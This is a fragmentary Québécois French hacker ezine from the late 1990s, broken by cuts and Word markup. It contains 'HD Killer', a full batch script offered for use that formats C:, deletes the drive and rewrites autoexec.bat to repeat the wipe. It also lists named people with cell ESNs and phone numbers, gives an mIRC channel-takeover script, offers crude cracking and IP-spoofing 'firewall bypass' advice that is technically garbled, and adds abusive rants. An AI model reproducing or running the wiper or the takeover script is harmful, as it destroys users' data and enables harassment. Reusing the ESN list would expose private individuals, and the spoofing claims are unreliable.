ç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a ne vous servira a rien! Pour les autres, enjoyer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applomb pis, si vous avez de la marde a cause de ça,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vez pas lu ça dans mon Ezine!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om                      ESN NUMBER   Téléphone    Activation      Typ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lbert Pouliot INC       25200777054  418-564-2404  02-05-99   Analog Upgra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solation de la Capitale 24107353228  418-580-1950  02-05-99   PCS Migratio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agner Systems           15903471319  418-563-8661  02-05-99   PCS Migratio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rigitte Leccault        25200917377  418-569-9646  18-05-99   Analog Upgra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ormand Roy              25202214377  418-569-7340  18-05-99   Analog Upgra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ntourage Sol.Tech.      25201921874  418-570-8729  18-05-99   Analog Upgra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tricia Turmaine        25200923047  418-563-0659  19-05-99   Analog Upgra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ndrien Fournier         25202260216  418-570-0841  20-05-99   Analog Upgra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lphonse Rousseau        23707421866  418-564-1887  27-05-99   Analog Upgra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enoit Jobin             15905431261  418-580-1524  28-05-99   PCS Migratio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rnst et Young           15903559524  418-570-6224  31-05-99   Activation P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rederic Montpas         A0085353     418-XXX-XXXX  10-05-99   Pager Numeri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eetroles R.Lepine       E1376082     418-XXX-XXXX  10-05-99   Pager Numeric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ebastien Barbeau        A0457142     418-XXX-XXXX  11-05-99   Pager Numeri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vid Gourde             A0007489     418-XXX-XXXX  13-05-99   Pager Numeri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onya Galarneau          E0480106     418-XXX-XXXX  14-05-99   Pager Numeri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vid Cimon              E1378248     418-XXX-XXXX  21-05-99   Pager Numeri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erome Larin             E0480122     418-XXX-XXXX  21-05-99   Pager Numeri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enny Parent             A0515075     418-XXX-XXXX  20-05-99   Pager Numeri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onathan Paquet          E0480338     418-XXX-XXXX  27-05-99   Pager Numeric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418-XXX-XXXX ne semble pas s'être fait assigner de numéro (Add New)</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Y'en a encore pleins comme ca. Si quelqu'un si connais pas mal en cel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igital ou analogue on aimeraient ben que vous nous écriviez un artic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estion d'avoir des informations récentes sur les cells comme les nouvel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rosses et celles qui ne se font pl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OUr lEs COOL qui OnT uN PAge et QuI vEULeNT fAirE De quOI dE VrAI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lASh pAGeR vOs ZAmIs pIs LaiSSer lEs NuméRos SuiVant Sur SOn PaG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uméros    signification (selon BELL)       signification (selon 912)</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666        C'est l'enf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9-1-1      Groui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7-47       On décole (pffff)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0          C'était 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000       As-tu un bog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360        Vient faire un t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514        Je suis à montréa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976      Je suis en manque d'affec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6-49       Bonne ch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007        Mission impossib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3         Ça va ma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81        On sort entre fi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0-4       O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80        J'ai changé d'idé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36-24-36   Beau pétar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5-4-3-2-1  On pa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20        Je suis au cour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50-50      Pas sû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maginer le criss d'équipe de moron qui on passé une semai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à dévellopper ce criss de concepte promotionel poche, sauf</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e c'est quand même excusable parce qu'ils font leur job,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es pires c les siboire de morons qui vont utiliser s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etits code morons la pis qui vont se penser cOoL wh000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oulFly[</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Quelques notion du cracking de password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emierement je vais vous expliquer comment qu'une verifica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password fonctionne, admeton que le password est 123456 et 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ecrivez 123455, eh bien lordinateur calcul 123456 - 123455</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 = 1... donc sa ne marchera pas tant et aussi longtemps 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quation ne donne pas "0"... ok maintenant je vais ESSAY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t'expliquer comment sa fonctionne toute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 quand tu rentre dans le programme qui a besoin d'un passwor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etton... le programme a des gates, "on" et d'autre "off" et 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ates off doivent s'ouvrir seulement quand tu ecrit le bon mo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pass... mais ceux ci ne sont que dans les rams de l'ordinat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ls ne sont pas qqpart de réèl, alors (suite a mon premier artic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ur le cracking que je vais paster juste en dessous) tu n'a qu'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tiliser un deboguer ou n'importe quoi qui fonctionne de cet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niere et change les gates de "off" a "on" en fouillant da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memoire accumulé dans les rams... donc sa ne devrais pl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e demander de password... c'est le meme principe pour crack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TP... mais la il depend des ordinateur, mais sur plusieur s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vrais marcher... a partir de dotre port que celui du site F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il te demande un password tu devrais etre capable d'accédé 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 memoire dans ses RAMS a lui et trouver les gates "on" et "off"</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insi tu n'aurait plus a scanner des FTP pendant 60 heure ave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s asti d'fichier d'mots de 600mb sa te prendrait juste 6 heu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rouver comment acceder a sa memoire rams... lol... je reve d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our que qqn va faire un hex editer pour la memoire rams s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mplifierai tellement le cracking de FTP... en-t-k la j'T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xpliquer le principe comment que sa fonctionne fake j'va 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isser travailler les neurones pour essayer ca pi bon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hanc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ukest4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Quelques Techniques sur le cracking en HE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emierement je vous averti ce text n'est pas pour les grand bolé j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ais tout simplement expliquer la base du language et le comment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nguage hex fonctionne et a partie de ca vous aller surment pou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ussir a cracker certaine affaires... premierement pour comprend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peu ce que tu voit dans le hex sa marche par loop comme tu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urment remarquer deja, s'est souvent des repetitions de plusieu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ois le meme code, exemple beaucoup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0000 0000 0000 0000 0000 c'est tout simplement ce qui sert a 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ontinuer le programme... quand admettons tu a un popup qu'y s'ouv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 te demande le registration # (par exemple) tu trouve l'endro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y demande ca... les popups sont souvent evident avec une part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u text dans la section qu'y montre le text tu n'a qu'a coup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parti qu'y le fait looper sur ce popup ou tout simplement effac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popup... ou il y a des programme plus simple pour faire ca gen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y montre toute les popups du programme et la tu peut les chang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omme tu veut... le hex c'est tellement puissant :)) Pour les j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mo que tu veut la vrai version aussi s'est pareille... tu do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tiliser le data de la vrai version et y enlever soir les vide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wathever et le faire faire oublier les video et que c'est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mo s'est aussi simple... saufe que le compliqué la dedans c'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trouvé les places ou est inscrit ce que tu veut editer... moi j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e conseille Hex Workshop (j'me souvient pu ou le trouver sur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et) mais celui la c'est une simple et pratique... il y a aus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ource Code Manager que jaime bien... c'est a vous de juger ave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quel vous etes mieux pour travailler :) Le text un peu plus lisib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ns le coté tu peut te situer un peu avec ca... et la c,est a t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faire des centaine de test pour relooper un loop ailleur! Fa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oujour un backup de ce que tu edit... pi aussi un conseille deme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and ya un prog faite en VB ou n'importe kelle text files ave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pass ou genre des files html ou n'importe koi kier pas compres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peut le lire avec le hex fake sa peut surment t'aider bc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 d'autre moyen aussi pour cracker c'est de trouvé le ID d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ialogue que tu veut editer ou enlever ou looper par dessus com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r exemple un dialogue qui demande le Registration # et ensu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e ta trouver le ID tu n'a qu'a le convertir en HEX soit avec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lculatrice ou avec le programme lui meme s'il le permet, pi u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ois en HEX code tu n'a qu'a le searcher dans le program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ttention s'est pas necessairement ce que tu va trouvé... tu d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aire des tests et des tests avant de le trouver ca sa peut e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ong aussi si le ID en hex a 3 ou wathever 5, 7 caracte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iquement tu doit toujours le mettre a 2, 4, 6 caracteres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e sa marche... car sa fonctionne en blocs... 2 bloc du hex = 1</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ytes... un autre truc pour retrouver ce que tu cherche dans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ogramme si tu ne l'a jamais trouvé utilise un deboguer... ave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 tu peut stopper le programme que tu load et automatiquement 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il est rendu a lire dans le Hex Code... c'est pamal pratique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enre quand metton un jeux load sur un cd pi tu veut qu'y load da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ordi sur un tel endroit eh bien sa peut etre pratiqu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n t k check ca comme faut c hot en chien le hex! j'va sur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rire un autre article dans le prochain zine plus professio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ur dotre technique plus evoluer pour cracker... bin voi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j'espere t'avoir encourager a utiliser c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ukest4r</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THE PROTECTOR VERSION 3.0, BY TH[|}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Un programme pour formatter les ordi a distanc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rPr>
        <w:t>saver le en .bat piur le runner...</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rPr>
        <w:t>pi fait pas l'erreur de te formatter toi meme lol</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off</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m THE PROTECTOR Version 3.0 par th[|}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PLEASE WAIT WHILE PROGRAM LOADS .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ll attrib -h -r c:\autoexec.bat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echo off &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all format c: /q /u /autotest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all deltree /y c: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dummy variable &gt;c:\dvar.tx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or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ll format c: /q /u /autotest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f exist c:\dos\format.* goto dosfor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f exist c:\windows\command\format.* goto winfor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oto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osfor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d\dos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ll format c: /h /q /u /autotest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d\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infor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d\windows\command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ll format c: /h /q /u /autotest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d\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oto infor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f exist c:\dvar.txt goto dtre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oto infor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tre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ll deltree /y c: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f exist c:\dos\deltree.* goto deldo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f exist c:\windows\command\deltree.* goto delw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oto infor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ldo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d\do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ll deltree /y c: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lwi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d\windows\command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ll deltree /y c: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d\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nfor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l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You have been hit by the Hard Drive Killer, written by th[|}x]. &gt;c:\hdkiller.tx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HD Killer is a th[|}x] Production. &gt;&gt;c:\hdkiller.tx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gt;&gt;c:\hdkiller.tx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Here is a message to all you but lickers. . . &gt;&gt;c:\hdkiller.tx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gt;&gt;c:\hdkiller.tx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YOU REMEMBER ME [TH|}X]]. &gt;&gt;c:\hdkiller.tx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gt;&gt;c:\hdkiller.tx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If you were destroyed by this HDkiller program, then you would have &gt;&gt;c:\hdkiller.tx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deserved it. Die you mother fuckers!!!! &gt;&gt;c:\hdkiller.tx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m The following rewrites the code into the autoexec.bat fi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echo off &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ls &gt;&gt;c:\autoexe.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for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all format c: /q /u /autotest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if exist c:\dos\format.* goto dosform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if exist c:\windows\command\format.* goto winform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goto de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dosform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d\dos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all format c: /q /u /autotest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d\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winform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d\windows\command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all format c: /q /u /autotest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d\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goto write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de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if exist c:\dvar.txt goto dtree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goto write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dtree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all deltree /y c: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if exist c:\dos\deltree.* goto deldos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if exist c:\windows\command\deltree.* goto delwin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deldos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d\dos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all deltree /y c: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d\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delwin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d\windows\command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all deltree /y c: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d\ &gt;nul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write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type hdkiller.txt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d\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nasty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md nasty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cd nasty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echo You're Gone @$$ hole!!!! &gt;yourgone.txt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goto nasty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pause &gt;&gt;c:\autoexec.b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m Rewriting of code to the autoexec.bat file is comple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d\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killf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d nasty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d nasty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cho You're Gone @$$ hole!!!! &gt;yourgone.txt &gt;n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oto killf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end</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Comment penetrer un system proteger par un firewall, par </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>TH[|}X]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
        </w:rPr>
        <w:t xml:space="preserv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Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Ma metode est particulierement agressive.pour la comprendre ,vousdevez avoire une base</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>du fonctionnement des resaux(pas besion de vous defoncer en lecture sur le sujet).un paquet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>IP contien a par le veritable message,toute une serie d information necessaire au transfere de donner de lexpediteur vers le receveur.habituellement, on peut modifier cest donner et en extraire les fonction de protection du firewall.pour cela vous devez falsifier l adresse du paquet IP avec un logiciel comme (ip spoof ou x-identiter ...)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Si je veut m attaquer a un ordinateur dans un resaux proteger par un firewall, je donne a cest paquets de donner ladresse dun poste qui se trouve dans le meme reseaux que lordinateur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>lorsque les paquets arrive au firewall, celui-ci verifie l adresse de lexpedition et ayant constater quil s agit de ladresse d un ordinateur interne au reseaux,il considaire que cest paquet sont sans danger et les transmet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>.Ma tecnique des paquets IP ne te permette pas dacceder aux systeme tout de suite.mais cest la premier etape pour acceder aux systeme car dans cest paquets vous pouvez envoyer des genvirus,des fichier .bat , des troyen et virus .....entk ceci est a votre gise.habituellement 1 seul paquet permet dexecuter le fichier envoyer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                                                    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>TH[|}X]</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Takeover Rulez, par VolCoM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Ptit_Criss_De_Lamer&gt; vnez tous sur #chan-o-lamerz on va tripper comme des fous .. amenez vous amis pis jvous o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anné d'la ****** de pub par les lamerz sur votre channel ?? .. Cet article est pour vous (: Voici quelques techniques pour vous défouler sur les putains de p'tit lamerz qui envahissent de plus en plus IRC... (sur les channels ou les bots de Cservice ne sont pas bien s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1) Comme c pas tlm qui est poches la premiere affaire a faire avant d'aller sur le channel c d'se spoofer pour pas arriver la en crétin , le gars t'fa un whois pis i voit t op sur le chan ou ya dla pub .. si yé pas vedge .. c Kick-Ban yesser ta manqué ta shot :)... fak tu te spoof pis tu vas voir genre le nombre de ops pis tu les whois tou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1ere tech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u d'mandes c ki le master du chan pis tu vas le voir en privé tu y'offre tout c'qui veut eggs, ftp tout la shit... ou pire si le gars yé lame tu y dmande de jouer au course a place d'avec son corps (/auto tonnick).. héh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2eme tech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eilleure technique un peu t'essaye de planter les ops un par un celui qui a le plus gros domaine (exemple: videotron, quebectel, cogéco...) on va l'appeler Mr. X c pas sorcier tu scan le domaine a Mr. X avec un wingate scanner .. tu spoof un ip sur son domaine tu pogne son nick, ident, realname.. tout ce temps la tu l'erplante toujours pour pas qui puisse join le channel .. tu rentre sur le channel un d'ses chums va te oper ... héh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3eme techn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u cas ou X ou W serait la bien la seule facon que tu puisse le faire chier c d'avoir le pass d'un gars en haut de 400 ... tu fais /msg &lt;w ou x&gt; access #&lt;le channel de lamerz&gt; -min 400 pis la seule affaire que tu peux faire ak ca c d'avoir acces au computer du gars .. physiquement *ce qui me parait improbable :)* ou par un autre moyen ... Dans ce cas si ta le pass cpas sorcier tu prend le meme mask que le gars en spoofant encore une fois... tu te log au bot de Cservice .. pis la tu fais des access a tlm que tu connais :)) auto op ON tlm arrive sul channel pis on fait un gros part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ici une p'tite commande de take que j'ai faite si vous voulez vous pouvez vous en servir est pas ben compliqué mais a pas été trop longue a faire non plu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lias to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f ( $me !isop $chan ) { echo -a 14[10Tu n'es pas opérateur de $chan $+ 14] | hal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else { set %suckerz $opnick($chan,0)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set %positionS 1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et %posmass 1</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oo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f ( %positionS &gt; %suckerz ) goto endta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lseif ( $nick($chan,%positionS) != $me ) &amp;&amp; ( $nick($chan,%positionS) != W ) &amp;&amp; ( $nick($chan,%positionS) != X ) { mode $chan -o $nick($chan,%positionS) | inc %positionS | goto loo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lse { inc %positionS | goto loo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ndta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ode $chan +min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opic $chan FuCk y0u l4m4h... d0nt m3ss w1f 3l1t3...</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assd0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et %massd0h $?="Mass kick ? (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f (%massd0h == n) hal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lseif (%massd0h == o) goto masskic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lse goto massd0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asskic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f (%posmass &gt; $nopnick($chan,0)) goto endtake2</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kick $chan $nopnick($chan,%posmass) pr0ud t0 b3 k1ck3d By 3l1t3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nc %posma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goto masskic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ndtake2</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echo -a 14[10Kick-Banned .. Takeover complete..14]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hal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musez vous au dépend des autres .. envoyez chier les ircops .. faite vous G-Lined .. ca va etre koo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olCoM (volcom@antionline.or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lusieurs d'entre vous allés a tout les jours sur IRC sans même avoir la même id du protocol IRC. RFC 1249 est si excitent a lire que j'ai décidé de vous illustrer un p'tit exemple comme par exemple comment se brancher a IRC via telnet... tres simp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 telnet &lt;addresse du server&gt; &lt;port [habituellement de 6660 a 6669 :P]&g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 qui pourrait vous aider a mieux vous comprendre serait d'aller dans Terminal -- Préférences .. cochez "echo local".. pour voir ou vous en êt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 envoyez votre nick et username au server pour vous enregistré au server apres avoir été connecté avec cette command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user &lt;username&gt; &lt;hostname&gt; &lt;server name&gt; : &lt;real name&g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xemp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hois volcom héhéh</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hois De vo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Real Name ]= I'm The Pédophile Squad's Mento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Host ]= ~koston@211-146.sh.cgocable.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Caneaux ]= #shawi @#grand-mere #CegepShawi @#ssm +#bunker @#po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Server ]= SaltLake.UT.US.UnderNet.Or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Away ]= Forum make the best snowboards... Cservice make the best gay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in Of Who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user koston localhost localhost : I'm The Pédphophile Squad's Mento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Le username ne doit pas contenir de numéro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3) nick &lt;votre nick&gt; .. tres compliqu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4) le server vous enverra kkchose comme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ing :1234567 &lt;== ces chiffres changent toujou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o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ing :69.69.69.69 &lt;== une addresse i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u dois renvoyez le nombre avec un pon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ong :1234567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o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ng :69.69.69.6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si tu ne renvois pas le pong tu seras déconnecté (ping timeo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elques petites command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une fois connecté le reste est tres simple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join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art #chann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quit le messa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rivmsg &lt;nick ou #channel&gt; :le message pour parler sur un channel ou avec    kk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You've got to know it before fucking all it up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VolCoM (volcom@antionline.org)</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Les 912HD Suck, par Dead Luc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riss la moé j'ecris cet artique la pcq chu ecoeure des osti de 912</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n c vrai criss y se vante de chose kion meme po faites pi en pl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y viennent dire que les qha c pour les debutant pi que les 912 c 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expert..tk moé j ai rien une chose a dire asti de criss C PO VRA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STI DE TABARNAK LES 912 C RIEN QUE DÉ CRISS DE SUCEUX DE QUEUE QUI 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ANTENT DE CHOSE KI ONT PAS FAITES...bon fais du bien mais attendez mo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sti j ai pas fini man fau j ecrive 40 k d artique fak la mas en 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40 d osti de bitcheries sur les sacrament de suceux de queue de 912</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ahahahaha 912 Hacking departement pfff non sont tu con po a peu p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te criss de gang la c les 912 Sucking Departement criss en plus so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eme po capable de faire un bon hack non ast quand il ont chang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ww.q-h-a.com asti c du volage de criss de password fak la enlever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 de la tete asti c po un criss d exploi j aimerais mieux pas etre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acker que devoir voler des mot de passe asti pour pirater une page web</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 en plus wzGate c rien qu un tabarnak de baveux qui se prend pour quelqu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 autre criss en plus yer sous window....pi l autre j ai fais un t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riss yer meme po proteger contre le oob (nuke pour que kan il va l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l va enfin comprendre c koi un oob ben gars la jte l dit..un oob c un nu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est retenue esti d enfant de pute..pi ticker lui c rien que un ast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 evader pi qui rgarde trop de film de hacking fak il se crois hack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 cause de tca ben moi j ai rien une chose a te dire Ticker YOU S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 je te mets au defi  d essayer de ma hacker pour le fun hein rien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fun criss si ca te tente mets toute ton petit crew de merde a essayer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e hacker je bet 100$ qui a personne du 912 qui est capable de pirat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 rien une bande d osti de sucker toéc pi tonm criss de crew jel sais ca fa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en des fois j el repete mais c pour etre sur que tas ben combris cr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ramoneur d anus criss de lamer criss de tout ce que tu voudra m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on avis pi a l avis de tout le monde vore crew c rien que de la bullsh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riss faudrai me payer man pour que je rentre dans ton esti de crew pi faudrais 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yer cher...pi anyway si vous vous vantez de meme c rien pcq vous etes une gant d est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looser pi vous avez toute la chienne de vous faire pirater pi d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aire plante par un autre crew vous penser que si vous faites a croire qu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es les meilleur asti les autres vous hackerons mais la vous vous etes fourr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out le monde vous hais pi je suis surement celui qui vous hais le pl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je commence a me répeter souvent ca montre tu tous le monde ca qu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es des asti de sucker de tabarnak de criss de sacrament de putain de mer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la je pense que c assez long comme article fak mas arreter ca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is je dois vous dire criss que ca ma faites du bien c peut etre c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is faulais jel disent pi en plus ca va etre dans le zine le plus gros</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jamais sorti au mond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rPr>
        <w:t>Dead Luck</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MMENT S'EN SORITIR DANS DES SITUATIONS PERILLEEUSES, par Clad Strif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ici on a hacké un site et une plainte risque d'être déposé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Merci vieux voila j ais hacker un site ifrance sans pb mais aujourd hui ifrance a remis une page ou ils disent qu'une plainte va etre deposee contre le hack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avec koi as-tu hacké la page ifr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ucifere&gt; bha comme j avais les mots de passe donc un cute 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en combien d'essai t'as fait ç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je t'explique, je suis sur ifrance donc je peyx te le dire... même si tu modifies les pass, la clé d'activation du compte sert aussi de password</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je lui avait envoyer un formulai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file l'url st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http://www.ifrance.com/bgfpa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ok j'vais voir il est aussi possible que le gars ai mis ça pour se veng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a ton avis je risqje pensse pas ja is matter sa boite de message et il a recu le meme tru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alors t dans la merde ils ont ton I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lorsque tu te connectes à un site web sous FTP, tu peux suivre les manips, et ton IP se fait logg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oui mais bon faut savoir si pour un site perso ils vont foutre le sou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ben ils en sont capables: c toi qu'est en tort, FT va leur filer ton adresse et tu seras incxulpé pour piraterie informatique 6 mois d'prison ou une amende de 50 à 100.000 f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tes parents payeront don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je suis mineur donc pas de taule  , et j ais envoyer un @mail a mon provider leur disant que ma connexion avait ete pirate don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ouaaah essaye de t'arranger avec Ifrance plutôt ou avec le ga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si tu te montre désolé et coopératif il se peut qu'il ne feront r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je verais bien mais je suis a plus de 600 bornes de lieu de la plainte  et si ma connexti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tu connais le mai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non don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ben va sur ifrance.com et tu chopes le mail explique ta posi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franchement a mon avis sa n ira pas loin ils vont pas depansser plein de fric pour ca en plus qu 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ça leur coute rien... en fait j'te conseille ça car j'avais piraté un serveur: j'croyais qu'il allait rien se pass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2 jours plus tard on m'apprend qu'j'ai une plainte au cul et qu'ils veulent m'emmener au tribuna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bon on a fait stroper la procédure, j'ai envoyé une lettre au gars pour m'excuser en disant que je n'avais détruit que l'index etc... imagine la tête du type en réuion quand il a voulu monytrer son site et... HACKED BY CSTRIF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uoi mais toi c etait un big serveur moi juste un site perso et puis j ais pas forcé le webmaster : on m avais donne les mots de pas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mais y'avait une plainte de déposé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atten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ne dis pas juste un site perso: si le gars se plaint à ifrance ifrance fera tout pour le satisfa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uoi mais toi c etait un big serfveur moi juste un site peros et puis j ais pas force le serveur : on m avais donne lesmots de pas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ben même si on te donne les pass: t dans ton tor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oui sureent mais wanadoo comme c'est la premiere fois devrait faire bouchon en ne communiquant rien sur m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ben oui mais là est le pb: esssaye de t'arranger avec ifrance ensuite avec le ga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pff quelle merd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ben surtout t'arrang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oui je vais redonner les passe , faire de plates excvuses etc... mais je donne pas mon @mail veritable où j'le donne mon veritable @ma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euh... ça c d'la franchise: je te conseille de le donner le vra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ils auront plus confi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ben oui enfin fa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moi j'ai pas envoyé d'e-mail mais j'ai dis au gars: "si vous voulez me contacter..." et j'ai donné mon adresse mail.... faut jouer franc jeu dans ces cas l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ils savent que c'est toi: ils ont ton i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oui mais dans ce cas la ma defense disant que ce n'est pas moi tombe a l'ea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oui mais si on a chope mon fichier pass on peut se servir de ma connesxy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attends... pour se servir de ta connexion il fa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ton pass ton N° d'abonné, avoir la ligne tel et que le modem passe sur ligne te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ça marchera pas ç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bas avec  lidentifiant et le mot de pass on peut se servir d une connex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enfin fais comme tu veux... ils s'en prendront au gars connecté à telle heure tel jour, t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maintenant si tu veux nier les faits avce une histoire bid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tu n'as pas le choix: arrange toi avec ifrance, s'ils ne t'écoutent pas ou t'envoient promener ça pourra jouer en ta faveur... de très pe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non mais la ca m inquite un pe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oui la je cherche des arguments  "je suis desole , je pensais pas faire de m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euh des aruments valables et réels surtout... si on sait que t'as mittoné, ce qui risque tès vite d'être le cas, c la mer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ne pas faire de mal, c ce que j'ai dis mais ça fait con vu que t'as hacké un site pas pour faire plaisir au ga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lo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mais ça fait bi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C bon ç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Bonjou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Je suis l'auteur du piratage du site BGfpag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Je tiens a presenter a vous presenter mes ecuses a vous ainsi qu'a l auteur du site , c'est la premiere fois que je fais ca est c'etait pour essayer plutot que pour nui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je regrete profondement mon acte qui je peut qualifier d idiot mais je le repete ce n'etait pas dans l intention de nui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voici la mot du pass du site bgfpage  ******** (gardé secr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L&gt; voici le mot de passe de l @mail afiz  ******** (gardé secr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Pour ma defense je n'es juste modifier que l index , le reste est toujours la j'ais fais ca s'en penser faire de mal , je me doutais que la page resterais que quelques heures avant quel ne soit changé par vous c'est la raison pour laquelle je ne pensais faire de m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En me connectant sur le site pour voire si vous aviez enleve la page je me suis apercu que vous envisagiez de porter plainte et la je me suis rendu compte que finalement ce que j avais fait aller beaucoup plus loin que se que je ne pensais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Ce qui est fait est fais et je le regrette profondement mais je ne peus pas revenir en arrie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ouaich maintenant met que tu es prêt à accepter toutes responsabilités, que c uniquement de ta faute et que bien entendu, tu préfèrerais que celà ne s'ébruite pas ni ne s'aggrave... tu demandes un arrangement à l'amiable, tu leur dis de donner ton e-mail à la victime pour t'arranger avec e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mais dis qui tu es et ce que tu as fait et ou pour qu'il sachent se repér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raaah! saloperie d'icq! neuralien peut pas recevoir ma chat requ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tu crois qu ils repondront? et quan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si ils comptent porter plainte oui, s'ils disaient ça dans le vent, possible auss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mais quand à la durée de la réponse elle ira entre aujourd'hui et dimanc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t;Clad Strife  &gt; ils ont plein de 